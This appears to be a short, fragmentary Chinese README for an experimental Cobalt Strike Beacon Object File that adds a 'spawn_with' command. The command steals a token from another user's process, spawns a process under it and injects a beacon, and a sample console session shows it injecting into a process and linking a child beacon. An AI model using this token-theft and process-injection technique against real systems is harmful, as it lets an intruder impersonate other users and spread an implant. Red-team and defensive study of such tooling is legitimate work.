一个实验性的 Beacon 对象文件(BOF),提供了 spawnas 和 inject 命令之外的替代方案。它暴露了一个新命令 spawn_with [pid] [listener],执行以下操作:
spawnto 值。CreateProcessWithTokenW 以复制的令牌生成一个新进程。
CreateProcessAsUserW。beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)
beacon> ps
22656 21972 wordpad.exe x64 1 DESKTOP-1U6AHIU\test_user
beacon> spawnto x64 %windir%\sysnative\notepad.exe
beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:
Spawned PID 45668 and injected 297472 bytes
[+] established link to child beacon: 192.168.0.195
